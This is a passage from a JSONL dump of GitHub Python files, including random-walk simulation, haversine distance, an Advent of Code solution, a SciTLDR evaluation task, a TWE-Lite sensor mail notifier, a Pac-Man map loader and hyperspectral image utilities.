max_depth=10,\n n_sims=1000,\n seed=None,\n n_bins=None,\n method=\"tree\",\n):\n pass\n\n\ndef generate_random_walks(\n prob_mat, from_inds, out_inds, n_walks=100, max_walk=25, return_stuck=False\n):\n n_verts = len(prob_mat)\n dead_inds = np.where(prob_mat.sum(axis=1) == 0)[0]\n stop_reasons = np.zeros(4)\n sm_paths = []\n visit_orders = {i: [] for i in range(n_verts)}\n for s in from_inds:\n for n in range(n_walks):\n curr_ind = s\n n_steps = 0\n path = [s]\n visit_orders[s].append(len(path))\n while (\n (curr_ind not in out_inds)\n and (n_steps <= max_walk)\n and (curr_ind not in dead_inds)\n ):\n next_ind = np.random.choice(n_verts, p=prob_mat[curr_ind])\n n_steps += 1\n curr_ind = next_ind\n path.append(curr_ind)\n visit_orders[curr_ind].append(len(path))\n if curr_ind in out_inds:\n stop_reasons[0] += 1\n sm_paths.append(path)\n elif curr_ind in dead_inds:\n stop_reasons[1] += 1\n if return_stuck:\n sm_paths.append(path)\n elif n_steps > max_walk:\n stop_reasons[2] += 1\n else:\n stop_reasons[3] += 1\n\n print(stop_reasons / stop_reasons.sum())\n print(len(sm_paths))\n return sm_paths, visit_orders\n\n\n# def _step(start, prob_mat, path, max_walk=30):\n# if len(path) < max_walk:\n# choice = 
np.random.choice(len(prob_mat), p=prob_mat[start])\n# path.append(choice)\n# return choice\n\n# def _random_walk(start, prob_mat, )\n# curr = start\n\n\n# if curr_ind in out_inds:\n# stop_reasons[0] += 1\n# sm_paths.append(path)\n# if curr_ind in dead_inds:\n# stop_reasons[1] += 1\n# if n_steps > max_walk:\n# stop_reasons[2] += 1\n\n","repo_name":"neurodata/maggot_models","sub_path":"src/traverse/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"25390997398","text":"\nimport math\n\n\ndef degree_to_radian(degree):\n return 2 * degree * math.pi / 360\n\n\ndef harversine(initial_coord, final_coord):\n # Distance between two coordinates (in km).\n r = 6371\n initial_rads = list(map(degree_to_radian, initial_coord))\n final_rads = list(map(degree_to_radian, final_coord))\n delta_phi = final_rads[0] - initial_rads[0]\n delta_lambda = initial_rads[1] - final_rads[1]\n h = math.sin(delta_phi/2) ** 2 + \\\n math.cos(initial_rads[0]) * math.cos(final_rads[0]) * \\\n math.sin(delta_lambda / 2) ** 2\n return 2*r*math.asin(math.sqrt(h))\n\n\n","repo_name":"RHDZMOTA/weather-api","sub_path":"util/distance_operations.py","file_name":"distance_operations.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43430454825","text":"#\n# Day 7: The Treachery of Whales\n# https://adventofcode.com/2021/day/7\n#\nfrom collections import defaultdict\nfrom typing import List\n\n\ndef parse_line(line: str) -> List[int]:\n num_str_list = line.rstrip().split(\",\")\n return [int(c) for c in num_str_list]\n\n\ndef summation(target: int) -> int:\n return sum([i for i in range(1, target + 1)])\n\n\ndef calculate(lines: list[str]) -> int:\n positions = parse_line(lines[0])\n min_fuel_costs = defaultdict(int)\n max_position = max(positions)\n for i in range(len(positions)):\n for j in range(max_position):\n num_moves = abs(positions[i] - j)\n min_fuel_costs[j] += summation(num_moves)\n return min(min_fuel_costs.values())\n\n\nif __name__ == \"__main__\":\n with open(\"input.txt\") as f:\n lines = f.readlines()\n fuel_cost = calculate(lines=lines)\n print(f\"There minimum fuel cost is {fuel_cost}.\")\n","repo_name":"jeffharrington/advent-of-code-2021","sub_path":"advent7/advent7b.py","file_name":"advent7b.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37696453574","text":"\"\"\"\nTLDR: Extreme Summarization of Scientific Documents\nhttps://arxiv.org/abs/2004.15011\n\nThe SciTLDR dataset is created specifically to study the task of TLDR (Too Long; Didn't Read) \ngeneration for scientific papers. 
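As a sanity check on harversine above (its degree_to_radian agrees with the stdlib math.radians), a well-known city pair lands near the published great-circle distance; coordinates are approximate:

```python
paris = (48.8566, 2.3522)
london = (51.5074, -0.1278)
print(round(harversine(paris, london)))   # roughly 344 km
```

Separately, the summation helper in advent7b admits Gauss's closed form, which avoids building the intermediate list:

```python
def summation_fast(target: int) -> int:
    return target * (target + 1) // 2   # 1 + 2 + ... + target

assert all(summation_fast(n) == sum(range(1, n + 1)) for n in range(200))
```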
TLDR generation is a form of extreme summarization that requires \nhigh source compression, expertise, and a thorough understanding of domain-specific language.\n\nWe use the Abstract only setting of TLDR (where the input is only the abstract of the paper)\n\nHomepage: https://github.com/allenai/scitldr\n\"\"\"\nimport re\nfrom itertools import islice\n\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\nimport string\nfrom catwalk.dependencies.lm_eval.base import Task, rf\nfrom catwalk.dependencies.lm_eval.metrics import mean\nfrom datasets import load_metric\n\n_CITATION = \"\"\"\n@article{cachola2020tldr,\n title={{TLDR}: Extreme Summarization of Scientific Documents},\n author={Isabel Cachola and Kyle Lo and Arman Cohan and Daniel S. Weld},\n journal={arXiv:2004.15011},\n year={2020},\n}\n\"\"\"\n\n_ARTICLES = re.compile(r\"\\b(a|an|the)\\b\", re.UNICODE)\n\n\nclass SciTLDR(Task):\n VERSION = 0\n DATASET_PATH = \"scitldr\"\n DATASET_NAME = None\n\n def __init__(self):\n super().__init__()\n self.bertscore = load_metric(\"bertscore\")\n self.bertscore_model_type = \"microsoft/deberta-xlarge-mnli\"\n self.rouge = load_metric(\"rouge\")\n self.metric_keys = {} # will be populated by get_metrics and used for aggregation\n\n def has_training_docs(self):\n return True\n\n def has_validation_docs(self):\n return True\n\n def has_test_docs(self):\n return True\n\n def training_docs(self):\n # Cache training for faster few-shot.\n # Data is too large to fit in memory.\n if self._training_docs is None:\n self._training_docs = list(self.dataset[\"train\"])\n return self._training_docs\n\n def validation_docs(self):\n return self.dataset[\"validation\"]\n\n def fewshot_examples(self, k, rnd):\n # Data is too large to fit in memory. We just sample from the first bit.\n if self._training_docs is None:\n self._training_docs = list(islice(self.training_docs(), 0, 100000))\n\n return rnd.sample(self._training_docs, k)\n\n def doc_to_text(self, doc):\n source_sentences = doc[\"source\"]\n source = \" \".join(source_sentences)\n return f\"Article: {source}\\nTLDR:\"\n\n def should_decontaminate(self):\n return True\n\n def doc_to_decontamination_query(self, doc):\n return \" \".join(doc[\"source\"])\n\n def doc_to_target(self, doc):\n # we take the first target. this is used for fewshot\n summary = doc[\"target\"][0]\n return summary\n\n def construct_requests(self, doc, ctx):\n \"\"\"Uses RequestFactory to construct Requests and returns an iterable of\n Requests which will be sent to the LM.\n\n :param doc:\n The document as returned from training_docs, validation_docs, or test_docs.\n :param ctx: str\n The context string, generated by fewshot_context. 
This includes the natural\n language description, as well as the few shot examples, and the question\n part of the document for `doc`.\n \"\"\"\n conts = [rf.greedy_until(ctx, [\"\\n\"])]\n return conts\n\n def process_results(self, doc, results):\n \"\"\"Take a single document and the LM results and evaluates, returning a\n dict where keys are the names of submetrics and values are the values of\n the metric for that one document\n\n :param doc:\n The document as returned from training_docs, validation_docs, or test_docs.\n :param results:\n The results of the requests created in construct_requests.\n \"\"\"\n # minimal cleaning\n results = [res.replace(\"\\n\", \" \").replace(\"\\t\", \" \").replace(\"\\r\", \" \").strip() for res in results]\n preds, golds = results, doc[\"target\"]\n results = self.get_metrics(preds, golds)\n return results\n\n def get_metrics(self, predicted, gold_summaries):\n \"\"\" \"\"\"\n # each summary can have multiple golds\n # rouge_score of huggingface doesn't support passing multiple summaries\n # we split it into two instances\n predictions = []\n for _ in gold_summaries:\n predictions.append(predicted)\n\n rouge_results = self.rouge.compute(\n predictions=predictions,\n references=gold_summaries,\n use_stemmer=True,\n use_aggregator=False,\n rouge_types=[\"rouge1\", \"rouge2\", \"rougeL\", \"rougeLsum\"],\n )\n for key, value in rouge_results.items():\n rouge_results[key] = {\n \"precision\": [score.precision * 100 for score in value],\n \"recall\": [score.recall * 100 for score in value],\n \"fmeasure\": [score.fmeasure * 100 for score in value],\n \"precision_mean\": np.mean([score.precision for score in value]) * 100,\n \"precision_max\": np.max([score.precision for score in value]) * 100,\n \"recall_mean\": np.mean([score.recall for score in value]) * 100,\n \"recall_max\": np.max([score.recall for score in value]) * 100,\n \"fmeasure_mean\": np.mean([score.fmeasure for score in value]) * 100,\n \"fmeasure_max\": np.max([score.fmeasure for score in value]) * 100,\n }\n\n rouge_results[\"rouge_mean\"] = (\n rouge_results[\"rouge1\"][\"fmeasure_mean\"]\n + rouge_results[\"rouge2\"][\"fmeasure_mean\"]\n + rouge_results[\"rougeL\"][\"fmeasure_mean\"]\n ) / 3\n\n # useful for multi-target summaries (e.g., scitldr)\n rouge_results[\"rouge_mean_of_max\"] = (\n rouge_results[\"rouge1\"][\"fmeasure_max\"]\n + rouge_results[\"rouge2\"][\"fmeasure_max\"]\n + rouge_results[\"rougeL\"][\"fmeasure_max\"]\n ) / 3\n\n bert_score_results = self.bertscore.compute(\n predictions=predictions,\n references=gold_summaries,\n # These are mostly based on the recommendations in https://github.com/Tiiiger/bert_score\n model_type=self.bertscore_model_type,\n lang=\"en\",\n rescale_with_baseline=True,\n use_fast_tokenizer=True,\n )\n bert_score_results[\"f1_mean\"] = np.mean(bert_score_results[\"f1\"])\n bert_score_results[\"f1_max\"] = np.max(bert_score_results[\"f1\"])\n\n results = {\n \"rouge1_fmeasure_mean\": rouge_results[\"rouge1\"][\"fmeasure_mean\"],\n \"rouge1_fmeasure_max\": rouge_results[\"rouge1\"][\"fmeasure_max\"],\n \"rouge2_fmeasure_mean\": rouge_results[\"rouge2\"][\"fmeasure_mean\"],\n \"rouge2_fmeasure_max\": rouge_results[\"rouge2\"][\"fmeasure_max\"],\n \"rougeL_fmeasure_mean\": rouge_results[\"rougeL\"][\"fmeasure_mean\"],\n \"rougeL_fmeasure_max\": rouge_results[\"rougeL\"][\"fmeasure_max\"],\n \"rougeLsum_fmeasure_mean\": rouge_results[\"rougeLsum\"][\"fmeasure_mean\"],\n \"rougeLsum_fmeasure_max\": rouge_results[\"rougeLsum\"][\"fmeasure_max\"],\n 
\"bertscore_f1_mean\": bert_score_results[\"f1_mean\"],\n \"bertscore_f1_max\": bert_score_results[\"f1_max\"],\n }\n self.metric_keys = list(results.keys())\n return results\n\n def aggregation(self):\n \"\"\"\n :returns: {str: [float] -> float}\n A dictionary where keys are the names of submetrics and values are\n functions that aggregate a list of metrics\n \"\"\"\n return {metric_key: mean for metric_key in self.metric_keys}\n\n def higher_is_better(self):\n \"\"\"\n :returns: {str: bool}\n A dictionary where keys are the names of submetrics and values are\n whether a higher value of the submetric is better\n \"\"\"\n return {metric_key: True for metric_key in self.metric_keys}\n","repo_name":"allenai/catwalk","sub_path":"catwalk/dependencies/lm_eval/tasks/scitldr.py","file_name":"scitldr.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"21782765901","text":"#!/usr/bin/env python3\n# -*- mode:python; coding:utf-8 -*-\n\nimport time\nimport sys\nfrom datetime import datetime,timedelta\nimport syslog\nimport os\nimport struct\nimport binascii\nimport glob\nimport pprint\nfrom logging import getLogger,INFO,DEBUG,Formatter\nfrom logging.handlers import SysLogHandler\nfrom email.header import decode_header\nfrom email.parser import Parser\nimport smtplib\nimport email\nfrom email.mime.text import MIMEText\n\nOutDir = \"/var/run/twe\"\nRainMarker = OutDir + \"/RainMarker\"\n\nhandler = SysLogHandler(address = '/dev/log', facility=SysLogHandler.LOG_USER)\nhandler.setFormatter(Formatter(\"twe-filter[%(process)d]: %(message)s\"))\nhandler.setLevel(INFO)\nlogger = getLogger(\"twe-filter\")\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\n\ndef decodeVolt(batt):\n volt = 0\n if batt <= 170:\n volt = 1950 + 5 * batt\n else:\n volt = 2800 + 10 * (batt - 170)\n return volt\n\ndef notifyStats(weather, voltage, results, toAddr):\n fromAddr=\"twe@localhost\"\n if 'MAIL_FROM' in os.environ:\n fromAddr = os.environ['MAIL_FROM']\n closed = \",\".join(sorted([chr(0x40 + v[\"id\"]) for v in results if v[\"pkt\"] == 254 and v[\"button\"] == 1]))\n opened = \",\".join(sorted([chr(0x40 + v[\"id\"]) for v in results if v[\"pkt\"] == 254 and v[\"button\"] == 0]))\n text = \"\\n\".join([weather, voltage, \"\", \" Opened: \" + opened, \" Closed: \" + closed])\n msg = MIMEText(text)\n msg['Subject'] = weather\n msg['From'] = fromAddr\n msg['To'] = toAddr\n recipients = toAddr.split(',')\n s = smtplib.SMTP()\n s.connect()\n s.sendmail(fromAddr, recipients, msg.as_string())\n s.close()\n\ndef collectDoorStatus():\n results = {}\n file_list = glob.glob(OutDir + \"/8*\")\n for f in file_list:\n if f.endswith(\".parsed\"):\n continue\n raw = open(f, \"r\")\n rx = raw.readline()\n parsed = parseTWELite(rx)\n if \"from\" in parsed:\n src = parsed[\"from\"]\n results[src] = parsed\n return results\n\ndef checkRain(parsed, results, rcpt):\n adc2 = int(parsed[\"adc2\"])\n volt = int(parsed[\"volt\"])\n ratio = float(adc2) / volt\n subject = \"The weather\"\n weather = \"\"\n if ratio < 0.5:\n # It's rain\n weather = \"It's rain.\"\n else:\n weather = \"It's NOT rain.\"\n voltage = \" adc2:{0:d}mV, volt:{1:d}mV\".format(adc2, volt)\n notifyStats(weather, voltage, results, rcpt)\n\ndef reportStats(results, rcpt):\n for parsed in results:\n if parsed[\"pkt\"] == 0x10:\n checkRain(parsed, results, rcpt)\n break\n \n\n# Decode output of vSerOutput_Uart().\ndef parseTWELite(raw):\n if raw[0] != \":\":\n return {}\n data = 
binascii.unhexlify(raw[1:])\n pkt = raw[25:27]\n result = None\n\n if pkt == '10':\n logger.debug(\"Received %s\", raw)\n # relay,LQI,FRAME,src,u8id,u8pkt,batt,adc1,adc2,PC1,PC2,CRC\n ss10 = struct.Struct(\">IBHIBBBHHHHB\")\n parsed = ss10.unpack(data)\n\n volt = decodeVolt(parsed[6])\n\n result = {\n \"relay\" : \"{0:08X}\".format(parsed[0]),\n \"lqi\" : parsed[1],\n \"frame\" : parsed[2],\n \"from\" : \"{0:08X}\".format(parsed[3]),\n \"id\": parsed[4],\n \"pkt\": parsed[5],\n \"volt\": volt,\n \"vc2\" : 2 * parsed[7],\n \"adc2\" : parsed[8],\n \"PC1\" : parsed[9],\n \"PC2\" : parsed[10],\n \"updated\" : datetime.now()\n }\n elif pkt == 'FE':\n # relay,LQI,FRAME,src,u8id,u8pkt,batt,adc1,adc2,param,DIbitmap,CRC\n ssFE = struct.Struct(\">IBHIBBBHHBBB\")\n parsed = ssFE.unpack(data)\n\n volt = decodeVolt(parsed[6])\n\n result = {\n \"relay\" : \"{0:08X}\".format(parsed[0]),\n \"lqi\" : parsed[1],\n \"frame\" : parsed[2],\n \"from\" : \"{0:08X}\".format(parsed[3]),\n \"id\": parsed[4],\n \"pkt\": parsed[5],\n \"volt\": volt,\n \"vc2\" : 2 * parsed[7],\n \"adc2\" : parsed[8],\n \"param\" : parsed[9],\n \"button\" : parsed[10],\n \"updated\" : datetime.now()\n }\n return result\n\ndef main():\n raw = sys.stdin.readlines()\n msg = email.message_from_string(''.join(raw))\n (name, fromAdddr) = email.utils.getaddresses(msg.get_all('From',''))[0]\n recipients=\"twe@localhost\"\n if 'RCPT_TO' in os.environ:\n recipients = os.environ['RCPT_TO']\n if fromAdddr in recipients.split(','):\n ioResults = collectDoorStatus()\n reportStats(ioResults.values(), fromAdddr)\n else:\n logger.warn(\"Unknown recipeint %s.\", fromAdddr)\n return\n \nif __name__ == '__main__':\n if not os.path.exists(OutDir):\n sys.exit(0)\n try:\n main()\n except Exception as e:\n logger.error('twe-filter.py', exc_info=True)\n","repo_name":"true-nature/App_DoorChecker","sub_path":"RaspberryPi/usr/local/bin/twe-filter.py","file_name":"twe-filter.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13198811809","text":"import random\nimport pytest\nimport copy\nimport collections\n\nfrom pymtl import *\nfrom pclib.test import run_test_vector_sim\n\nclass CPU_TOP(VerilogModel):\n\tdef __init__(s):\n\t\ts.debug = InPort(1)\n\t\ts.inr = InPort(3)\n\t\ts.outvalue = OutPort(16)\n\t\ts.pc = OutPort(10)\n\t\ts.memory_address = OutPort(10)\n\t\ts.outvale = OutPort(16)\n\t\ts.set_ports({\n\t\t\t'clock': s.clk,\n\t\t\t'reset': s.reset,\n\t\t\t'debug': s.debug,\n\t\t\t'inr': s.inr,\n\t\t\t'pc': s.pc,\n\t\t\t'memory_address': s.memory_address,\n\t\t\t'outvalue': s.outvalue\n\t\t\t})\n\n\tdef line_trace( s ):\n\t\treturn '{} {} {}'.format(s.pc,s.memory_address,s.outvalue)\n\n\nvector_header = ['reset debug inr pc* memory_address* outvalue*']\n\nexpected_pc = [0,1,2,3,4,5,6,7,8,9,10,11,12,5,6,7,8,9,10,11,12,5,6,7,8,9,10,11,12,5,6,7,8,9,10,11,12,5,6,7,8,9,10,11,12,13]\nexpected_load_address = [263,264,265,266,267,268]\nexpected_store_address = [269,270,271,272,273,274]\nexpected_outvalue = [6,8,9,10,11,12]\n\ndef gen_test_vector():\n\ttest_vector = []\n\tfor pc in expected_pc:\n\t\trow = [0,0,0,'?','?','?'];\n\t\tif pc == 7:\n\t\t\trow[4] = expected_load_address.pop(0)\n\t\tif pc == 10:\n\t\t\trow[4] = expected_store_address.pop(0)\n\t\t\trow[5] = expected_outvalue.pop(0)\n\t\ttest_vector.append(row)\n\treturn test_vector\n\ndef test_sample_program( dump_vcd ):\n\ttest_vector = copy.deepcopy(vector_header)\n\ttest_vector = test_vector + 
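parseTWELite above leans on struct.Struct format strings such as ">IBHIBBBHHHHB" (big-endian unsigned 32/8/16-bit fields); the mechanics in miniature:

```python
import struct

ss = struct.Struct(">IBH")                # big-endian: uint32, uint8, uint16
packed = bytes.fromhex("810e0f2b070201")  # 4 + 1 + 2 = 7 bytes
addr, ident, frame = ss.unpack(packed)
print(hex(addr), ident, frame)            # 0x810e0f2b 7 513
```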
gen_test_vector()\n\trun_test_vector_sim(CPU_TOP(), test_vector, dump_vcd)\n\t\n","repo_name":"MattCatz/elec-5200","sub_path":"components/CPU_TOP/CPU_TOP_test.py","file_name":"CPU_TOP_test.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17638936638","text":"import dearpygui.dearpygui as dpg\nfrom datetime import datetime\nfrom common import state_continue, state_no_quote, state_stop_loss, state_stop_retrace, state_stop_hold, get_3_prices, \\\n should_sell\n\ndef save_callback():\n print(\"Save Clicked\")\n\ndpg.create_context()\ndpg.create_viewport()\ndpg.setup_dearpygui()\n\nstock = '1.600800'\nbuy_date = datetime(2022, 3, 18)\nbuy_price = 5.08\nmax_hold_days = 9\nhold_days, highest, lowest, lowest_aft_highest, = get_3_prices(stock, buy_date)\n\nwith dpg.window(label=\"Example Window\"):\n dpg.add_text(\"Hello world\")\n dpg.add_button(label=\"Save\", callback=save_callback)\n dpg.add_input_text(label=\"string\")\n dpg.add_slider_float(label=\"float\")\n\ndpg.show_viewport()\ndpg.start_dearpygui()\ndpg.destroy_context()","repo_name":"tinyboyz/sellreminder","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38930337634","text":"import pygame\r\nimport wall1\r\nimport dot\r\nimport node\r\nimport pacman\r\nimport ghosts\r\nimport random\r\n\r\n\r\nclass Map:\r\n def __init__(self, display_size, tile_size):\r\n '''\r\n Initializes a map object with attributes: map_file, display_size, tile_size, tile_list, wall_list, dot_list, big_dot_list, node_list.\r\n '''\r\n #self.map_file is a text file with a bunch of 1's and 0's based on what we want in that position.\r\n self.map_file = open('assets/map.txt', 'r')\r\n\r\n #self.display_size is the size of the display, this may not need to be used in this class\r\n self.display_size = display_size\r\n \r\n #self.tile_size is the size of the tile in pixels that we want. We can determine this\r\n #based on how big in pixels we want the map to be. The size\r\n #of the tiles are 15x15 and the size of the map is 28x36\r\n self.tile_size = tile_size\r\n\r\n def load_map(self):\r\n '''\r\n Reads a text file with directions on how to create the map.\r\n Loads in image files respectively.\r\n '''\r\n #this reads the file and creates a list of the certain sprites based on the letter.\r\n #self.tile_list looks something like -> [['1', '1', '1',...], ['1', '0', '0',...], [...], ...]\r\n self.tile_list = []\r\n for line in self.map_file:\r\n self.tile_list.append(list(line.rstrip()))\r\n self.map_file.close()\r\n\r\n #reads the self.tile_list, the 'row' variable is the index of the current list iteration,\r\n #the 'col' is index of each character in the current 'row'. 
This loops through each\r\n #tile in the 2D list and then creates a 'Wall' sprite in the correct spot.\r\n #it then returns each list so we can make it a sprite group and blit it to the screen.\r\n #list of walls\r\n self.wall_list = []\r\n #list of small dots\r\n self.dot_list = []\r\n #list of big dots\r\n self.big_dot_list=[]\r\n #list of nodes at each intersection\r\n self.node_list = []\r\n #list of ghosts\r\n self.ghost_list = []\r\n for row in range(len(self.tile_list)):\r\n for col in range(len(self.tile_list[row])):\r\n if self.tile_list[row][col] in ['h', 'v', 'w', 'x', 'y', 'z']:\r\n self.wall_list.append(wall1.Wall(col*self.tile_size, row*self.tile_size, 'normal-rect.png'))\r\n elif self.tile_list[row][col] == 'd':\r\n self.dot_list.append(dot.Dot(col*self.tile_size, row*self.tile_size, 'dot.png', 'd'))\r\n elif self.tile_list[row][col] == 'D':\r\n self.big_dot_list.append(dot.Dot(col*self.tile_size, row*self.tile_size, 'bigdot.png', 'D'))\r\n elif self.tile_list[row][col] == 'n':\r\n self.node_list.append(node.Node(col*self.tile_size, row*self.tile_size, 'red-square.png'))\r\n self.dot_list.append(dot.Dot(col*self.tile_size, row*self.tile_size, 'dot.png', 'd'))\r\n elif self.tile_list[row][col] == 'P':\r\n self.pacman_x=col*self.tile_size\r\n self.pacman_y=row*self.tile_size\r\n self.pacman_tile = pacman.Pacman(col*self.tile_size, row*self.tile_size, \"pacman1.png\", 0)\r\n elif self.tile_list[row][col] == 'r':\r\n self.ghost_list.append(ghosts.Ghost(col*self.tile_size, row*self.tile_size, 'redghost.png', random.choice([0,2]), \"red\", 2))\r\n self.ghost_rx=col*self.tile_size\r\n self.ghost_ry=row*self.tile_size\r\n \r\n self.dot_list.append(dot.Dot(col*self.tile_size, row*self.tile_size, 'dot.png', 'd'))\r\n elif self.tile_list[row][col] == 'p':\r\n self.ghost_list.append(ghosts.Ghost(col*self.tile_size, row*self.tile_size, 'pinkghost.png', 1, \"pink\", 1))\r\n self.ghost_px=col*self.tile_size\r\n self.ghost_py=row*self.tile_size\r\n elif self.tile_list[row][col] == 'b':\r\n self.ghost_list.append(ghosts.Ghost(col*self.tile_size, row*self.tile_size, 'blueghost.png', 1, \"blue\", 1))\r\n self.ghost_bx=col*self.tile_size\r\n self.ghost_by=row*self.tile_size\r\n \r\n elif self.tile_list[row][col] == 'o':\r\n self.ghost_list.append(ghosts.Ghost(col*self.tile_size, row*self.tile_size, 'orange-ghost.png', 1, \"orange\", 1))\r\n self.ghost_ox=col*self.tile_size\r\n self.ghost_oy=row*self.tile_size\r\n elif self.tile_list[row][col] == 'g':\r\n self.wall_list.append(wall1.Wall(col*self.tile_size, row*self.tile_size, 'black-grey.png'))\r\n \r\n return self.wall_list, self.dot_list, self.node_list, self.big_dot_list, self.pacman_tile, self.ghost_list\r\n\r\n","repo_name":"theresagun/cs110FinalProject","sub_path":"maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9277848977","text":"from typing import List, Optional, Tuple, Union\nfrom matplotlib import pyplot as plt\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.axes import Axes\nimport torch\n\nfrom covpred.visualization.common import VisualizationImage, INCH_PER_PIXEL\n\n\ndef dense_covariance_images(imgs: VisualizationImage | List[VisualizationImage], **kwargs) -> Tuple[Figure, List[Axes]]:\n if isinstance(imgs, VisualizationImage):\n imgs = [imgs]\n\n default_figsize = (\n len(imgs) * INCH_PER_PIXEL * imgs[0].img.shape[1] + (len(imgs) - 1) * 10 * INCH_PER_PIXEL,\n INCH_PER_PIXEL * 
imgs[0].img.shape[0],\n )\n figsize = kwargs.get(\"figsize\", default_figsize)\n\n def create_img_viz(ax: Axes, img: torch.Tensor):\n # works because img is flipped\n ax.imshow(img.to(\"cpu\"))\n\n ax.set_xlim(0, img.shape[1])\n ax.set_ylim(img.shape[0], 0)\n\n fig, axs = plt.subplots(1, len(imgs), figsize=figsize)\n for img, ax in zip(imgs, axs):\n ax.axis(\"off\")\n create_img_viz(ax, img.img)\n\n plt.tight_layout()\n return fig, axs\n","repo_name":"DominikMuhle/dnls_covs","sub_path":"scripts/covpred/visualization/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"24985095230","text":"import spectral\nimport spectral.io.envi as envi\nimport numpy as np\n\n\ndef get_wavelength(path_image):\n h = envi.read_envi_header(path_image)\n lambdas = (np.asarray(h[\"wavelength\"])).astype(np.float32)\n return lambdas\n\n\ndef read_cube(path_image):\n img = envi.open(path_image)\n arr = img.load()\n arr[arr < 0] = 0\n arr[arr > 1] = 1\n cube = np.zeros((np.shape(arr)[2], np.shape(arr)[0], np.shape(arr)[1]), dtype=np.float32)\n for i in range(np.shape(arr)[2]):\n tmp = np.reshape(arr[:, :, i], (np.shape(arr)[0], np.shape(arr)[1]))\n cube[i, :, :] = tmp\n\n return cube\n\n\ndef read_cropped_layer(path_image, x_start, y_start, x_end, y_end, layer):\n img = envi.open(path_image)\n cropped_layer = img[y_start:y_end, x_start:x_end, layer]\n cropped_layer = np.reshape(cropped_layer, (cropped_layer.shape[0], cropped_layer.shape[1]))\n cropped_layer[cropped_layer < 0] = 0\n cropped_layer[cropped_layer > 1] = 1\n return cropped_layer\n\n\ndef read_layer(path_image, layer):\n img = envi.open(path_image)\n layer = img.read_band(layer)\n layer[layer < 0] = 0\n layer[layer > 1] = 1\n return layer\n\n\ndef calculate_spectra_rectangle(path_image, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n spectra = list()\n n_band = np.shape(img)[2]\n for i in range(n_band):\n sub = img[y_start:y_end, x_start:x_end, i]\n sub = sub[sub <= 1]\n sub = sub[sub >= 0]\n val = np.mean(sub)\n spectra.append(val)\n\n spectra = np.asarray(spectra)\n spectra = np.reshape(spectra, (1, n_band))\n return spectra\n\n\ndef calculate_spectra_pixel(path_image, x_pix, y_pix):\n img = envi.open(path_image)\n n_band = np.shape(img)[2]\n spectra = img.read_pixel(y_pix, x_pix)\n spectra = np.reshape(spectra, (1, n_band))\n return spectra\n\n\ndef cluster(path_image, nb_cluster, nb_iteration, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n sub = img.read_subregion((y_start, y_end), (x_start, x_end))\n sub[sub < 0] = 0\n sub[sub > 1] = 1\n (m, c) = spectral.kmeans(sub, nb_cluster, nb_iteration)\n return (m, c)\n\n\ndef cluster_pca(path_image, nb_cluster, nb_iteration, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n sub = img.read_subregion((y_start, y_end), (x_start, x_end))\n sub[sub < 0] = 0\n sub[sub > 1] = 1\n pc = spectral.principal_components(sub)\n pc_0999 = pc.reduce(fraction=0.999)\n sub_pc = pc_0999.transform(sub)\n sub_pc_real = sub_pc.real\n (m, c) = spectral.kmeans(sub_pc_real, nb_cluster, nb_iteration)\n return (m, c)\n\n\ndef calculate_spectral_angles(path_image, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n sub = img.read_subregion((y_start, y_end), (x_start, x_end))\n ref_spectra = calculate_spectra_rectangle(path_image, x_start, y_start, x_end, y_end)\n spectral_angles = spectral.spectral_angles(sub, ref_spectra)\n return 
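The paired boolean-mask assignments used throughout spectral_library above (arr[arr < 0] = 0 followed by arr[arr > 1] = 1) are equivalent to a single np.clip:

```python
import numpy as np

a = np.array([-0.2, 0.4, 1.7], dtype=np.float32)
a = np.clip(a, 0.0, 1.0)   # same effect as the two masked assignments
print(a)                   # [0.  0.4 1. ]
```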
np.reshape(spectral_angles, (np.shape(spectral_angles)[0], np.shape(spectral_angles)[1]))\n\n\ndef calculate_spectral_map(path_image, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n sub = img.read_subregion((y_start, y_end), (x_start, x_end))\n sub[sub < 0] = 0\n sub[sub > 1] = 1\n pc = spectral.principal_components(sub)\n pc_0999 = pc.reduce(fraction=0.999)\n sub = pc_0999.transform(sub)\n sub = sub.real\n spectral_map = np.zeros((np.shape(sub)[0], np.shape(sub)[1]))\n for y in range(1, np.shape(sub)[0]-1):\n for x in range(1, np.shape(sub)[1]-1):\n new_spectra = np.reshape(sub[y, x, :], (1, 1, np.shape(sub)[2]))\n tmp = [\n\t\t\tabs(spectral.spectral_angles(new_spectra, np.reshape(sub[y-1, x-1, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y-1, x, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y-1, x+1, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y, x-1, :], (1, np.shape(sub)[2])))),\n 